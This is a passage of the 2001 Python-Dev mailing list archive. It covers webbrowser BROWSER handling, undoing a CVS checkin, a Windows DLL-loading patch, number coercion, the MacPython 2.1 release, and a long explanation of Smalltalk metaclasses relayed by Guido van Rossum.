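            to_register.append(name)
    return try_order, to_register
```

A caller could then register each name in `to_register` with something like `webbrowser.register(name, None, webbrowser.GenericBrowser(name))`, which matches the `register(name, constructor, instance)` form of current Python versions.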

Skip


From esr at thyrsus.com  Thu May 31 22:08:21 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 16:08:21 -0400
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>; from skip@pobox.com on Thu, May 31, 2001 at 02:57:21PM -0500
References: <15126.41505.987887.477670@beluga.mojam.com>
Message-ID: <20010531160821.A10314@thyrsus.com>

Skip Montanaro <skip at pobox.com>:
> I think webbrowser should either ignore elements of BROWSER if
> they have not previously been registered (and can't be found by _iscommand)
> or try to register them using GenericBrowser.  Users are apparently not the
> only people setting BROWSER, so the comment in the code:

Fred Drake and I are co-responsible for that code.  If you want to patch it
to do this, I won't object.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"They that can give up essential liberty to obtain a little temporary 
safety deserve neither liberty nor safety."
	-- Benjamin Franklin, Historical Review of Pennsylvania, 1759.


From fdrake at acm.org  Thu May 31 22:18:26 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 16:18:26 -0400 (EDT)
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.34825.167026.520535@beluga.mojam.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
Message-ID: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > I just updated httplib.py to expand the list of names in its __all__ list.
 > I was operating on version 1.34.  After the checkin I am looking at version
 > 1.34.2.1.  I see that Lib/CVS/Tag exists in my directory tree and says
 > "release21-maint".  Did I muff it?  If so, how should I do an unmuff
 > operation?

  If that's really a muff, revert the change:

        cd .../Lib/
        cvs diff -r1.34.2.1 -r1.34 httplib.py | patch

and commit the new version as 1.34.2.2:

        cvs commit -m 'unmuff...' httplib.py


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From skip at pobox.com  Thu May 31 22:30:22 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 15:30:22 -0500
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <20010531160821.A10314@thyrsus.com>
References: <15126.41505.987887.477670@beluga.mojam.com>
	<20010531160821.A10314@thyrsus.com>
Message-ID: <15126.43486.320228.376505@beluga.mojam.com>

    Eric> Fred Drake and I are co-responsible for that code.  If you want to
    Eric> patch it to do this, I won't object.

Here's a first pass that seems to work for me:

    https://sourceforge.net/tracker/index.php?func=detail&aid=429136&group_id=5470&atid=305470

though it doesn't attempt to recover if _tryorder winds up empty.

Skip


From skip at pobox.com  Thu May 31 22:48:40 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 15:48:40 -0500
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
	<15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
Message-ID: <15126.44584.300357.360209@beluga.mojam.com>

    >> I just updated httplib.py to expand the list of names in its __all__
    >> list.  I was operating on version 1.34.  After the checkin I am
    >> looking at version 1.34.2.1.  I see that Lib/CVS/Tag exists in my
    >> directory tree and says "release21-maint".  Did I muff it?  If so,
    >> how should I do an unmuff operation?

    Fred>   If that's really a muff, revert the change:

    Fred>         cd .../Lib/
    Fred>         cvs diff -r1.34.2.1 -r1.34 httplib.py | patch

    Fred> and commit the new version as 1.34.2.2:

    Fred>         cvs commit -m 'unmuff...' httplib.py

Functionally, the checkin isn't a muff (it does have the change I intended),
but I was worried about the version number.  Should I have checked it in as
version 1.34.2.1 or 1.35?

Skip


From fdrake at acm.org  Thu May 31 23:00:34 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 17:00:34 -0400 (EDT)
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>
References: <15126.41505.987887.477670@beluga.mojam.com>
	<20010531160821.A10314@thyrsus.com>
Message-ID: <15126.45298.666556.20710@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > or try to register them using GenericBrowser.  Users are apparently not the
 > only people setting BROWSER, so the comment in the code:
 > 
 >     # It's the user's responsibility to register handlers for any unknown
 >     # browser referenced by this value, before calling open().
 > 
 > seems like flawed logic to me.

Eric S. Raymond writes:
 > Fred Drake and I are co-responsible for that code.  If you want to patch it
 > to do this, I won't object.

  I wouldn't object either.  I *do* object to either Mandrake or Gnome
setting that variable by default -- that's just stupid and inconsiderate
of the user.
  Now, if anyone can provide support for Nautilus, I won't object to
that either.  Unfortunately, Mandrake's installer stinks at upgrading
(it couldn't seem to locate my 7.2 installation) and I don't have the
time to figure that out.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Thu May 31 23:04:30 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 17:04:30 -0400 (EDT)
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.44584.300357.360209@beluga.mojam.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
	<15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
	<15126.44584.300357.360209@beluga.mojam.com>
Message-ID: <15126.45534.417066.445852@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > Functionally, the checkin isn't a muff (it does have the change I intended),
 > but I was worried about the version number.  Should I have checked it in as
 > version 1.34.2.1 or 1.35?

  If the change should happen on the branch, leave it in.  If it's
also needed on the HEAD, check it in again there, and you're done.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From MarkH at ActiveState.com  Tue May  1 02:42:19 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Tue, 1 May 2001 10:42:19 +1000
Subject: [Python-Dev] Importing extensions on Windows 95
In-Reply-To: <3AED7248.B7386B83@lemburg.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPOEDIDLAA.MarkH@ActiveState.com>

> Here's a stab at a patch. Could you review it and test it ? I
> don't have enough knowledge of win32 for this...

I think we can drop the getcwd call here completely.

I prefer the patch below.

Mark.

Index: dynload_win.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v
retrieving revision 2.7
diff -u -r2.7 dynload_win.c
--- dynload_win.c	2000/10/05 10:54:45	2.7
+++ dynload_win.c	2001/05/01 00:36:40
@@ -163,24 +163,21 @@
 
 #ifdef MS_WIN32
 	{
-		HINSTANCE hDLL;
+		HINSTANCE hDLL = NULL;
 		char pathbuf[260];
-		if (strchr(pathname, '\\') == NULL &&
-		    strchr(pathname, '/') == NULL)
-		{
-			/* Prefix bare filename with ".\" */
-			char *p = pathbuf;
-			*p = '\0';
-			_getcwd(pathbuf, sizeof pathbuf);
-			if (*p != '\0' && p[1] == ':')
-				p += 2;
-			sprintf(p, ".\\%-.255s", pathname);
-			pathname = pathbuf;
-		}
-		/* Look for dependent DLLs in directory of pathname first */
-		/* XXX This call doesn't exist in Windows CE */
-		hDLL = LoadLibraryEx(pathname, NULL,
-				     LOAD_WITH_ALTERED_SEARCH_PATH);
+		LPTSTR dummy;
+		/* We use LoadLibraryEx so Windows looks for dependent DLLs 
+		    in directory of pathname first.  However, Windows95
+		    can sometimes not work correctly unless the absolute
+		    path is used.  If GetFullPathName() fails, the LoadLibrary
+		    will certainly fail too, so use its error code */
+		if (GetFullPathName(pathname,
+				    sizeof(pathbuf),
+				    pathbuf,
+				    &dummy))
+			/* XXX This call doesn't exist in Windows CE */
+			hDLL = LoadLibraryEx(pathname, NULL,
+					     LOAD_WITH_ALTERED_SEARCH_PATH);
 		if (hDLL==NULL){
 			char errBuf[256];
 			unsigned int errorCode;
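To see what changes for a bare module filename, the sketch below contrasts the two path computations in pure Python. `old_dll_path` and `new_dll_path` are hypothetical names; the second only approximates GetFullPathName() (the real call also handles per-drive current directories, UNC paths and more), and nothing here calls the Windows API. Note also that, as posted, the `+` lines store the resolved path in `pathbuf` but still pass `pathname` to LoadLibraryEx().

```python
import ntpath  # Windows path rules; pure Python, importable on any OS


def old_dll_path(pathname, cwd):
    """Mimic the removed code: a bare filename becomes ".\\name", prefixed
    with the drive letter of the current directory (if any)."""
    if "\\" in pathname or "/" in pathname:
        return pathname
    drive = cwd[:2] if cwd[1:2] == ":" else ""
    return drive + ".\\" + pathname


def new_dll_path(pathname, cwd):
    """Rough stand-in for GetFullPathName(): join with cwd and normalize."""
    return ntpath.normpath(ntpath.join(cwd, pathname))


print(old_dll_path("spam.pyd", "C:\\Python21"))
print(new_dll_path("spam.pyd", "C:\\Python21"))
```

For a bare `spam.pyd` with current directory `C:\Python21`, the old logic yields the drive-relative `C:.\spam.pyd`, while the full-path approach yields `C:\Python21\spam.pyd`.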


From thomas at xs4all.net  Tue May  1 10:07:48 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 1 May 2001 10:07:48 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Python bltinmodule.c,2.198,2.199
In-Reply-To: <E14tPxo-0001LL-00@usw-pr-cvs1.sourceforge.net>; from tim_one@users.sourceforge.net on Sat, Apr 28, 2001 at 01:20:24AM -0700
References: <E14tPxo-0001LL-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010501100748.M16486@xs4all.nl>

On Sat, Apr 28, 2001 at 01:20:24AM -0700, Tim Peters wrote:
> Update of /cvsroot/python/python/dist/src/Python
> In directory usw-pr-cvs1:/tmp/cvs-serv4629/python/dist/src/Python
> 
> Modified Files:
> 	bltinmodule.c 
> Log Message:
> Fix buglet reported on c.l.py:  map(fnc, file.xreadlines()) blows up.
> Also a 2.1 bugfix candidate (am I supposed to do something with those?).

No, not really. You can do me a favor by writing halfway decent checkin
messages (no complaints there) and keeping your fingers off the 'fix
whitespace' button :) I keep a close eye on the checkins as they happen, and
save away those that might need to be checked into the 2.1.1 branch. I'll go
over them with a fine-tooth comb when I'm approaching critical release mass
:)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Tue May  1 12:30:57 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 01 May 2001 12:30:57 +0200
Subject: [Python-Dev] Importing extensions on Windows 95
References: <LCEPIIGDJPKCOIHOBJEPOEDIDLAA.MarkH@ActiveState.com>
Message-ID: <3AEE9061.32239814@lemburg.com>

Mark Hammond wrote:
> 
> > Here's a stab at a patch. Could you review it and test it ? I
> > don't have enough knowledge of win32 for this...
> 
> I think we can drop the getcwd call here completely.
>
> I prefer the patch below.

If this works as expected, please check in the patch. (Note that
I have not tested the patch I posted -- I've never used VC++ for
anything else than compiling C extensions and GMP.)
 
> Mark.
> 
> Index: dynload_win.c
> ===================================================================
> RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v
> retrieving revision 2.7
> diff -u -r2.7 dynload_win.c
> --- dynload_win.c       2000/10/05 10:54:45     2.7
> +++ dynload_win.c       2001/05/01 00:36:40
> @@ -163,24 +163,21 @@
> 
>  #ifdef MS_WIN32
>         {
> -               HINSTANCE hDLL;
> +               HINSTANCE hDLL = NULL;
>                 char pathbuf[260];
> -               if (strchr(pathname, '\\') == NULL &&
> -                   strchr(pathname, '/') == NULL)
> -               {
> -                       /* Prefix bare filename with ".\" */
> -                       char *p = pathbuf;
> -                       *p = '\0';
> -                       _getcwd(pathbuf, sizeof pathbuf);
> -                       if (*p != '\0' && p[1] == ':')
> -                               p += 2;
> -                       sprintf(p, ".\\%-.255s", pathname);
> -                       pathname = pathbuf;
> -               }
> -               /* Look for dependent DLLs in directory of pathname first */
> -               /* XXX This call doesn't exist in Windows CE */
> -               hDLL = LoadLibraryEx(pathname, NULL,
> -                                    LOAD_WITH_ALTERED_SEARCH_PATH);
> +               LPTSTR dummy;
> +               /* We use LoadLibraryEx so Windows looks for dependent DLLs
> +                   in directory of pathname first.  However, Windows95
> +                   can sometimes not work correctly unless the absolute
> +                   path is used.  If GetFullPathName() fails, the LoadLibrary
> +                   will certainly fail too, so use its error code */
> +               if (GetFullPathName(pathname,
> +                                   sizeof(pathbuf),
> +                                   pathbuf,
> +                                   &dummy))
> +                       /* XXX This call doesn't exist in Windows CE */
> +                       hDLL = LoadLibraryEx(pathname, NULL,
> +                                            LOAD_WITH_ALTERED_SEARCH_PATH);
>                 if (hDLL==NULL){
>                         char errBuf[256];
>                         unsigned int errorCode;

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Tue May  1 23:22:11 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 01 May 2001 23:22:11 +0200
Subject: [Python-Dev] Coercion and comparison of numbers
Message-ID: <3AEF2903.79308F55@lemburg.com>

I just received a bug report for mx.Number which revealed a
problem with the comparison code in Python 2.1. Looking at
the code it seems that one of my original coercion patches
did not make it into the core. I added a new API PyNumber_Compare()
which knows about the new coercion mechanism and should be called for
numbers instead of trying coercion in PyObject_Compare().

Was this part of the coercion patch left out on purpose or
a simple oversight ? I hope the latter... 

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jack at oratrix.nl  Tue May  1 23:23:59 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Tue,  1 May 2001 23:23:59 +0200 (MET DST)
Subject: [Python-Dev] MacPython 2.1 released
Message-ID: <20010501212359.792FADDDF0@oratrix.oratrix.nl>

MacPython 2.1 is available for download. Get it via
http://www.cwi.nl/~jack/macpython.html .


Python is a high-level programming language that is suitable for
simple scripting tasks as well as writing large
applications. MacPython offers a lot of Mac-specific extensions,
including access to all major MacOS Toolbox modules (QuickDraw,
QuickTime, AppleScript and many more), an Integrated Development
Environment (in Python!), frameworks for windowing applications,
unix-compatible cgi-scripting, image-manipulation libraries, numerical
libraries, tk-based machine independent windowing and lots more. It
also uniquely among Pythons allows you to create fully self-contained
(and, hence, distributable) applications without needing a C compiler
or anything.

New in this version:
- A choice of Carbon or Classic runtime, so runs on anything between
  MacOS 8.1 and MacOS X
- Distutils support for easy installation of extension packages
- BBedit language plugin
- All the platform-independent Python 2.1 mods
- New version of Numeric
- Lots of bug fixes
- Choice of normal and active installer

Please send feedback on this release to pythonmac-sig at python.org,
where all the MacPythoneers hang out.

Enjoy,


--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From guido at digicool.com  Wed May  2 02:52:29 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 19:52:29 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
Message-ID: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>

Jim Althoff (a big commercial user of J[P]ython) sent me a summary of
how metaclasses work in Smalltalk.  He should know, since he invented
them! :-)  I include it below, with his permission.

While implementing more class-like behavior for built-in types in the
experimental descr-branch in the 2.2 CVS tree, I've noticed problems
caused by Python's collapsing of class attributes and instance
attributes.

For example, suppose d is a dictionary.  My experimental changes make
d.__class__ return DictType (from the types module).
(DictType.__class__ is TypeType, by the way.)  I also added special
methods.  For example, d.__repr__() now returns repr(d).  I am
preparing for subclassing of built-in types, so I will eventually be
able to derive a class MyDictType from DictType, as follows:

class MyDictType(DictType):
  ...

Now comes the fun part.  Suppose MyDictType wants to define its own
repr():

class MyDictType(DictType):
  def __repr__(self):
    return "MyDictType(%s)" % DictType.__repr__(self)

But, (surprise, surprise!), DictType itself also has a __repr__()
method: it returns the string "<type 'dictionary'>".

So the above code would fail: DictType.__repr__() returns
repr(DictType), and DictType.__repr__(self) raises an argument count
error.  The correct __repr__ method for dictionary objects can be
found as DictType.__dict__['__repr__'], but that looks hideous!

What to do?  Pragmatically, I can make DictType.__repr__ return
DictType.__dict__['__repr__'], and all will be well in this example.
But we have to tread carefully here: DictType.__class__ is TypeType,
but DictType.__dict__['__class__'] is a descriptor for the __class__
attribute on dictionary objects.

The best rule I can think of so far is that DictType.__dict__ gives
the *true* set of attribute descriptors for dictionary objects, and is
thus similar to Smalltalk's class.methodDict that Jim describes
below.  DictType.foo is a shortcut that can resolve to either
DictType.__dict__['foo'] or to an attribute (maybe a method) of
DictType described in TypeType.__dict__['foo'], whichever is defined.
If both are defined, I propose the following, clumsy but backwards
compatible rule: if DictType.__dict__['foo'] describes a method, it
wins.  Otherwise, TypeType.__dict__['foo'] wins.
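A minimal Python sketch of the proposed rule, for illustration only: plain dicts stand in for DictType.__dict__ and TypeType.__dict__, and MethodDescr and resolve_type_attr() are hypothetical names, not part of the descr-branch. For simplicity the sketch returns the descriptor itself instead of applying it.

```python
class MethodDescr:
    """Hypothetical marker for a __dict__ entry that "describes a method"."""

    def __init__(self, name):
        self.name = name


def resolve_type_attr(type_dict, metatype_dict, name):
    """Resolve DictType.name given DictType.__dict__ and TypeType.__dict__."""
    in_type = name in type_dict
    in_meta = name in metatype_dict
    if in_type and in_meta:
        # Both defined: a method in the type's own dict wins;
        # anything else defers to the metatype's entry.
        if isinstance(type_dict[name], MethodDescr):
            return type_dict[name]
        return metatype_dict[name]
    if in_type:
        return type_dict[name]
    if in_meta:
        return metatype_dict[name]
    raise AttributeError(name)


# Stand-ins for DictType.__dict__ and TypeType.__dict__.
dict_type_dict = {
    "__repr__": MethodDescr("dict.__repr__"),
    "__class__": "descriptor for d.__class__",  # not a method
    "keys": MethodDescr("dict.keys"),
}
type_type_dict = {
    "__repr__": MethodDescr("type.__repr__"),
    "__class__": "TypeType",
}

print(resolve_type_attr(dict_type_dict, type_type_dict, "__repr__").name)  # dict.__repr__
print(resolve_type_attr(dict_type_dict, type_type_dict, "__class__"))      # TypeType
```

The asymmetry is exactly what makes the rule clumsy: whether DictType.foo means "the instances' method" or "an attribute of the type object" depends on what kind of object happens to sit in DictType.__dict__.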

Sigh.

--Guido van Rossum (home page: http://www.python.org/~guido/)

------------------------- Jim Althoff's message ---------------------------

Hi Guido,

I was reading the discussion on class methods in the python-dev archive and
noticed your question about how Smalltalk determines the difference between
instance methods and class methods.  I have some info on this which I can't
post to python-dev, not being a member; but I thought you might be
interested in it anyway.

It turns out that I am the one that devised metaclasses in Smalltalk-80.
(On the other hand, I haven't looked at any Smalltalk implementation code
in a long time so this is merely a description of how it all started.)

Basically (I think) Smalltalk doesn't have the ambiguity you mention for
instance methods versus class methods (as Python would) because Smalltalk
doesn't do method lookup the same way Python does.

To illustrate, suppose you have object.method() (using Python-style syntax).

The Smalltalk method lookup is as follows:
o find the class that object is an instance of  --  this resulting thing is
a "class object" (a first-class object, same as in Python)
o since class is a "class object" one of its fields will be a dict of
methods -- let's call it class.methodDict
o find method in class.methodDict
o if found, execute method on object
o if not, do the same thing traversing the (single inheritance) superclass
chain (follow class.superClass)
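The lookup steps above can be modelled with a few lines of Python. This is a toy sketch, not Smalltalk's implementation: STObject, STClass and send() are made-up names, and the class objects' own classes (their metaclasses) are simply left as None here.

```python
class STObject:
    """Any object in the toy model: it only knows which class it belongs to."""

    def __init__(self, st_class, **fields):
        self.st_class = st_class
        self.fields = fields


class STClass(STObject):
    """A class object: an object with a methodDict and a superClass field."""

    def __init__(self, st_class, methods, superclass=None):
        super().__init__(st_class)
        self.methodDict = dict(methods)
        self.superClass = superclass


def send(receiver, selector, *args):
    """Look selector up in the receiver's class, then up the superClass chain."""
    cls = receiver.st_class
    while cls is not None:
        if selector in cls.methodDict:
            return cls.methodDict[selector](receiver, *args)
        cls = cls.superClass
    raise AttributeError(f"{selector!r} not understood")


Object = STClass(None, {"describe": lambda self: "an object"})
Point = STClass(None, {"x": lambda self: self.fields["x"]}, superclass=Object)

p = STObject(Point, x=3, y=4)
print(send(p, "x"))         # 3, found in Point.methodDict
print(send(p, "describe"))  # an object, found via Point.superClass
```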

I believe Python works roughly as follows (just testing my own
understanding here -- correct me if I don't get it right):
o convert (conceptually at least) object.method() into
object.__class__.method(object)
o find a _function_ corresponding to method in object.__class__.__dict__
o if found, execute the found function (with object bound as the first arg
to function)
o if not, traverse the (multiple inheritance) superclass chain (depth
first)

I think the key difference is that Python treats object.method() the same
as it treats object.__class__.method(object).  Smalltalk doesn't do this.
In Smalltalk, object.__class__.method(object) would mean:
o consider object.__class__ to be an "object" like any other "object" in
Smalltalk (which it is)
o get the "class object" of object.__class__, namely
object.__class__.__class__
o find method in object.__class__.__class__.methodDict
o if found, execute the method on object.__class__
o if not, do the same thing traversing the (single inheritance) superclass
chain (follow object.__class__.__class__.superClass)

In other words, it's exactly the same lookup mechanism.  So there is no
ambiguity.

To summarize, in Smalltalk:

o instance methods (for instances that are not "class objects") are
specified by:  instance.instanceMethod()

o class methods are specified by:  class.classMethod()

o both of these are just object.objectMethod() since classes are objects
and the method lookup mechanism is no different from that of any other kind
of object.

A concrete example:

If I have a class Date in Smalltalk and an instance of it referenced by
variable, d.  I would do:
o d.followingDate() for an instance method, and
o Date.currentDate() for a class method
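A toy Python model of the Date example, assuming Jim's description: the same send() serves both calls, and the class method lives in the methodDict of Date's own class. STObject, STClass, send() and DateMetaClass are illustrative names, and currentDate returns a fixed date instead of reading a clock so the output is predictable.

```python
import datetime


class STObject:
    """Anything in the toy world: it just knows its class."""

    def __init__(self, st_class, **fields):
        self.st_class = st_class
        self.fields = fields


class STClass(STObject):
    """A class object: an object that also has a methodDict and superClass."""

    def __init__(self, st_class, methods, superclass=None):
        super().__init__(st_class)
        self.methodDict = dict(methods)
        self.superClass = superclass


def send(receiver, selector, *args):
    # One lookup rule for every receiver, instance or class alike.
    cls = receiver.st_class
    while cls is not None:
        if selector in cls.methodDict:
            return cls.methodDict[selector](receiver, *args)
        cls = cls.superClass
    raise AttributeError(selector)


# DateMetaClass holds the "class methods"; Date is its (single) instance.
DateMetaClass = STClass(None, {
    # Fixed date instead of today() so the example is deterministic.
    "currentDate": lambda cls: STObject(cls, day=datetime.date(2001, 5, 1)),
})
Date = STClass(DateMetaClass, {
    "followingDate": lambda self: STObject(
        self.st_class, day=self.fields["day"] + datetime.timedelta(days=1)),
})

d = send(Date, "currentDate")   # class method: found in DateMetaClass
e = send(d, "followingDate")    # instance method: found in Date
print(e.fields["day"])          # 2001-05-02
```

Sending currentDate to d fails, because d's class is Date and Date's methodDict does not contain it; no special rule is needed to keep the two kinds of method apart.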

I think this is a nice, conceptually simple model.   Things get
interesting, though, when you start to consider how the mechanism of
class.__class__ -- which is the thing that makes class methods no different
than instance methods -- actually works.  And this leads to metaclasses in
Smalltalk.

Here's a rough sketch of how metaclasses work:

Standard principles of Smalltalk:
o everything is an object (first-class)
o every object is an instance of a class
o a class inherits (single-inheritance) from its superclass (except the
root class Object, which has no superclass)
o methods can be invoked on an object.  All such methods are defined as part
of the object's class definition (or a class going up the superclass chain)

Because of the first 2 principles above:
o every class is an object (because everything is an object)
o every class is, itself, an instance of some class (because every object
is an instance of a class)

Originally in Smalltalk-76,  there was one metaclass, Class. All classes
(class objects) were instances of Class.  Class was an instance of itself.
Class had methods defined for it just like all classes did.  In particular,
it had a method "new" -- this being the method that creates instances of
classes.  So suppose you had class Rectangle.  Rectangle is an instance of
Class (hence it is a class object).  If you wanted to create an instance of
Rectangle, you would do: myRect = Rectangle.new().   This would mean: "find
the 'new' method in the definition of Rectangle's class (Class) and invoke
it on Rectangle (which is a class object)."  The result is a Rectangle
instance which is assigned to the variable myRect.  The Rectangle class
object held data (state -- same rules as any other kind of object) -- such
as number and name of fields its instances would have, a dictionary of
methods for its instances, etc.  So the "new" method in Class would have
access to all the info it needed to create a Rectangle instance (as opposed
to a Point instance, for example).

The limitation with this scheme was that all classes had to share exactly
the same methods, namely all the methods defined in Class.  The method
"new" was one of these methods along with lots of  "reflection-type"
methods for class creation, modification, and inspection.  But if you
wanted an "application-oriented" class method -- like Date.currentDate() --
you couldn't do that because then the method "currentDate" would be shared
amongst all class objects (instances of Class) and wouldn't make any sense
(e.g., Rectangle.currentDate()).
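A toy Python model of the Smalltalk-76 arrangement, to make the limitation concrete. STObject, send() and class_new() are hypothetical names, and the field-name check in class_new() merely stands in for the class object's state that 'new' consults.

```python
class STObject:
    """Toy object: its class plus a dict of named state."""

    def __init__(self, st_class, **state):
        self.st_class = st_class
        self.state = state


def send(receiver, selector, *args, **kwargs):
    """Look selector up in the receiver's class and its superClass chain."""
    cls = receiver.st_class
    while cls is not None:
        methods = cls.state["methodDict"]
        if selector in methods:
            return methods[selector](receiver, *args, **kwargs)
        cls = cls.state["superClass"]
    raise AttributeError(selector)


def class_new(cls, **fields):
    """'new', defined once in Class; it reads the receiving class's own state."""
    expected = set(cls.state["fieldNames"])
    if set(fields) != expected:
        raise TypeError(f"{cls.state['name']} expects fields {sorted(expected)}")
    return STObject(cls, **fields)


# The single metaclass: Class is an instance of itself.
Class = STObject(None, name="Class", fieldNames=[], superClass=None,
                 methodDict={"new": class_new})
Class.st_class = Class

# Every class object, Rectangle included, is an instance of Class.
Rectangle = STObject(Class, name="Rectangle", fieldNames=["origin", "corner"],
                     superClass=None, methodDict={})

myRect = send(Rectangle, "new", origin=(0, 0), corner=(2, 3))
print(myRect.st_class is Rectangle)  # True
```

Any "class method" added to Class's methodDict, such as a currentDate, would be understood by Rectangle and every other class as well, which is the limitation described above.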

In Smalltalk-80 I added a more flexible mechanism which we called
metaclasses (we hadn't used that terminology previously for the single
Class although it was a "metaclass").  The thing that everyone in the
Smalltalk development team liked about the new metaclass mechanism at the
time was that it didn't require any new basic principles for Smalltalk.  It
was all done using the same basic principles of Smalltalk listed above.
The idea was to use subclassing to allow for different methods for
different instances of Class.  A "metaclass" simply became a subclass of
Class.  Each class object then ended up being a singleton instance
(although the "singleton-ness" was not mandatory) of a metaclass (i.e., a
subclass of Class).  So class objects were no longer _all_ instances of the
_same_ class (Class).  Each was an instance of a corresponding subclass of
Class -- that is to say, an instance of a metaclass.

The Smalltalk-80 class hierarchy looked like the following:
(This is actually a simplification.  The actual hierarchy has a little
more factoring and I changed the names for more clarity.)

First a digression on some terminology:
o a class is an object that can be instantiated
o a metaclass is a class and one such that when it is instantiated, the
instance is itself a class
o a plain-object is one that cannot be instantiated  (I'm just making this
term up).
o a plain-class is one that is a class but is not a metaclass  (making this
up, too).

In the list below, indentation indicates class hierarchy (superclass --
subclass)

plain-class                                     metaclass
-----------                                     ---------
<none>                                          o Class
   o Object                      isInstanceOf      o ObjectMetaClass  isInstanceOf  MetaClass
      o Class                    isInstanceOf         o ClassMetaClass  isInstanceOf  MetaClass
         o MetaClass             isInstanceOf            o MetaClassMetaClass  isInstanceOf  MetaClass
      . . .
      o Rectangle                isInstanceOf         o RectangleMetaClass  isInstanceOf  MetaClass
         o SpecializedRectangle  isInstanceOf            o SpecializedRectangleMetaClass  isInstanceOf  MetaClass

All "metaclasses" are instances of MetaClass.  All "plain-classes" (those
that are not "metaclasses") are instances of a "metaclass".  Because of
this there are parallel class hierarchies between "plain-classes" and their
corresponding "metaclasses".  Note that MetaClass is a "plain-class" and
not a "metaclass".  Also note that MetaClass (being a "plain-class") is an
instance of its corresponding "metaclass" MetaClassMetaClass.  And
MetaClassMetaClass is an instance of MetaClass (because MetaClassMetaClass
_is_ a "metaclass").  The MetaClass / MetaClassMetaClass class/instance
relationship is circular.

An example.   If you want a Rectangle class you first make a metaclass for
it, RectangleMetaClass  -- actually, the system does this for you
automatically as part of the class creation method implementation (when you
define the class Rectangle, for example).  RectangleMetaClass is an
instance of MetaClass so all the methods defined in MetaClass are available
to it.  RectangleMetaClass can also define its own methods now  (because it
is a class) which would be invoked on any (typically one) instance of
RectangleMetaClass, which in this case is going to be class Rectangle.  You
then make your Rectangle class by making an instance of RectangleMetaClass
(conceptually doing:  Rectangle = RectangleMetaClass.new()  ).   Now you
can make instances of Rectangle, doing:  myRect = Rectangle.new() as
before.  This is not so different from the Smalltalk-76 mechanism.  The
main advantage is that you now have a specific class, RectangleMetaClass,
that can have methods specific to the class Rectangle (the instance of
RectangleMetaClass).  So you could define a method like
"newFromPointToPoint" for example and then do:  myRect =
Rectangle.newFromPointToPoint(point1,point2).  The meaning is the same as
always: take the variable "Rectangle", find out what it is pointing to.  It
is pointing to an instance of the RectangleMetaClass.  Find the method
"newFromPointToPoint" as part of the definition of RectangleMetaClass (it
being a class object).  Invoke this method on the Rectangle class object --
which then creates a Rectangle instance.  The same would go for the other
example: Date.currentDate().
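The same arrangement can be approximated with the metaclasses Python itself later gained (Python 3 syntax; an analogy, not Smalltalk semantics). RectangleMeta plays the role of RectangleMetaClass, and representing a rectangle as (x, y, width, height) is an assumption made for the example.

```python
class RectangleMeta(type):
    """Plays the role of RectangleMetaClass: its methods are sent to the class."""

    def newFromPointToPoint(cls, point1, point2):
        (x1, y1), (x2, y2) = point1, point2
        return cls(min(x1, x2), min(y1, y2), abs(x2 - x1), abs(y2 - y1))


class Rectangle(metaclass=RectangleMeta):
    def __init__(self, x, y, width, height):
        self.x, self.y, self.width, self.height = x, y, width, height


class SpecializedRectangle(Rectangle):
    pass  # shares RectangleMeta; Python makes no new metaclass per subclass


myRect = Rectangle.newFromPointToPoint((4, 1), (1, 3))
print(myRect.x, myRect.y, myRect.width, myRect.height)  # 1 1 3 2
```

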